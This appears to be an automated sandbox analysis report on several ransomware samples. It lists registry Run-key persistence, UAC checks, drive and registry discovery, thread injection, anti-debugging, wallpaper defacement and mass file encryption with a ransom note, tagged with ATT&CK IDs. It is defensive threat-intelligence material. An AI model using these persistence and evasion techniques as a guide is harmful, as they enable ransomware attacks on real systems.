Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\{C2DBF329-FC79-64D5-4055-B2B80A0CAE52} = "C:\\Users\\Admin\\AppData\\Roaming\\Ytviat\\zeise.exe"	qiyg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\{07D8D716-112C-92EE-DA5C-CAF716526BFD} = "C:\\Users\\Admin\\AppData\\Roaming\\Ytviat\\zeise.exe"	zeise.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\{07D8D716-112C-92EE-DA5C-CAF716526BFD} = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\juvdhrrg\\vsfaeubt.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd = "C:\\Users\\Admin\\Desktop\\00310\\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe"	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe

Checks whether UAC is enabled 1 TTPs 20 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeregasm.exesvhost.exeWMIC.exeauthupd.exeqiyg.execmd.execmd.exeRegAsm.exeTrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exezeise.execmd.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	regasm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WMIC.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	authupd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qiyg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	zeise.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

chtbider.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe

description	ioc	Process
File opened (read-only)	\??\F:	chtbider.exe
File opened (read-only)	\??\D:	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
File opened (read-only)	\??\F:	Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
File opened (read-only)	\??\D:	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

remove IFEO.

defense_evasion

Clear Persistence

T1070.009

Processes:

Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3eae57177e1k3w5.exe\DisableExceptionChainValidation	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
364	checkip.dyndns.org

Maps connected drives based on registry 3 TTPs 47 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeIEXPLORE.EXETrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeregasm.exesvhost.exeTrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.execmd.execmd.execipher.exeWMIC.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeexplorer.exeqiyg.exeauthupd.execipher.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeRegAsm.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exezeise.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	regasm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	svhost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	qiyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	authupd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cipher.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regasm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	qiyg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	authupd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	WMIC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	zeise.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	cipher.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	zeise.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/files/0x0007000000016334-87.dat	autoit_exe

Drops file in System32 directory 10 IoCs

Processes:

powershell.exesvchost.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\wbem\repository\WRITABLE.TST	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING3.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\INDEX.BTR	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
File opened for modification	C:\Windows\SysWOW64\Microsoft\Crypto\RSA\MachineKeys\fc1e3851f429ea606d6ff1e01a5229f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
File opened for modification	C:\Windows\system32\wbem\repository	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING1.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING2.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\OBJECTS.DATA	svchost.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

zeise.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bmpbc07cb5b.bmp"	zeise.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

taskhost.exeDwm.exeExplorer.EXEvssadmin.execonhost.execonhost.exeDllHost.execonhost.exeyctik.exevssadmin.execonhost.exe

pid	Process
1112	taskhost.exe
1112	taskhost.exe
1112	taskhost.exe
1112	taskhost.exe
1184	Dwm.exe
1184	Dwm.exe
1184	Dwm.exe
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE
1184	Dwm.exe
1184	Dwm.exe
1184	Dwm.exe
1112	taskhost.exe
1248	Explorer.EXE
1112	taskhost.exe
1248	Explorer.EXE
1112	taskhost.exe
1248	Explorer.EXE
1112	taskhost.exe
1248	Explorer.EXE
1960	vssadmin.exe
1960	vssadmin.exe
1960	vssadmin.exe
1628	conhost.exe
1628	conhost.exe
1628	conhost.exe
1960	vssadmin.exe
1960	vssadmin.exe
1960	vssadmin.exe
1484	conhost.exe
1484	conhost.exe
1484	conhost.exe
1484	conhost.exe
1484	conhost.exe
1484	conhost.exe
3288	DllHost.exe
3288	DllHost.exe
3288	DllHost.exe
3288	DllHost.exe
3288	DllHost.exe
3288	DllHost.exe
1160	conhost.exe
1160	conhost.exe
1160	conhost.exe
1160	conhost.exe
1160	conhost.exe
1160	conhost.exe
1760	yctik.exe
1760	yctik.exe
1760	yctik.exe
2160	vssadmin.exe
2160	vssadmin.exe
2160	vssadmin.exe
1628	conhost.exe
1628	conhost.exe
1628	conhost.exe
3980	conhost.exe
3980	conhost.exe
3980	conhost.exe
3980	conhost.exe
3980	conhost.exe
3980	conhost.exe

Suspicious use of SetThreadContext 20 IoCs

Processes:

HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeyctik.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTrojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exesemo.exeIIXguS.exeadsnobby.exesvchost.exechtbider.exesvchost.exeregasm.exeauthupd.exeExplorer.EXE

description	pid	Process	procid_target
PID 776 set thread context of 2820	776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe	52
PID 2996 set thread context of 1760	2996	yctik.exe	61
PID 2168 set thread context of 1512	2168	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe	58
PID 1436 set thread context of 1388	1436	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe	63
PID 1144 set thread context of 2580	1144	Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe	69
PID 1284 set thread context of 2060	1284	Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe	71
PID 3036 set thread context of 2996	3036	semo.exe	59
PID 496 set thread context of 3680	496	IIXguS.exe	88
PID 4768 set thread context of 3724	4768	adsnobby.exe	114
PID 3724 set thread context of 1248	3724	svchost.exe	21
PID 4076 set thread context of 1480	4076	chtbider.exe	120
PID 1480 set thread context of 1248	1480	svchost.exe	21
PID 2508 set thread context of 7084	2508	regasm.exe	121
PID 4700 set thread context of 5872	4700	authupd.exe	107
PID 1248 set thread context of 5136	1248	Explorer.EXE	133
PID 1248 set thread context of 1552	1248	Explorer.EXE	140
PID 1248 set thread context of 2184	1248	Explorer.EXE	151
PID 1248 set thread context of 4088	1248	Explorer.EXE	153
PID 1248 set thread context of 2992	1248	Explorer.EXE	157
PID 1248 set thread context of 5192	1248	Explorer.EXE	165

Drops file in Program Files directory 64 IoCs

Processes:

qiyg.exe

description	ioc	Process
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\ybzipiopiwvuybukatintitiynlaykvykidiopvoxa.locked	qiyg.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	qiyg.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	qiyg.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi	qiyg.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\mapaveqicavyiliwfyitulselunitupaoploulbewubovetiifroi.locked	qiyg.exe
File created	C:\Program Files\7-Zip\Lang\ul.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\on.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\[HOW_TO_DECRYPT_FILES].html	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\ytweasymfyviydnesuecatlitioqukhema.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\biuhryuqriheiditoxpihuelwoicawyzixw.locked	qiyg.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\ovyfetakkeotythotuweubxaibtougaxpecybeyzihpuryoswoamyzukuzuxet.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\saylsyreoxidvafycixuemohusbipaliarnedaovhadodeuzfuadyquqixyxoxxieqdaec.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\ivunsytioqesuhinibhyezuhosolewbiqyxoneepn.locked	qiyg.exe
File created	C:\Program Files\7-Zip\Lang\xe.locked	qiyg.exe
File created	C:\Program Files\7-Zip\Lang\iru.locked	qiyg.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png	qiyg.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\ocunripautsoefsaohyxemuhrayxab.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\coomwyzaalcoceduwaatuqydrowonyampuraihloegusfel.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\ycegifnoqyamzinuykbutyarhiomozxyseyxnuorpeciab.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\icywqipyrohyfewaaddeoqofkuitecinozrubiuqyxyx.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\kihoavkurimoamubursiiguwge.locked	qiyg.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	qiyg.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\ciyrkeasl.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\coamusidevsailihbiupryvoykdoolba.locked	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\daneubawyqloozunqatoicafirapraysxeofroizgyuhpacaevdafaizgevoyrqe.locked	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar	qiyg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar	qiyg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\peebxiafgoipzaiqetovamotemt.locked	qiyg.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml	qiyg.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml	qiyg.exe
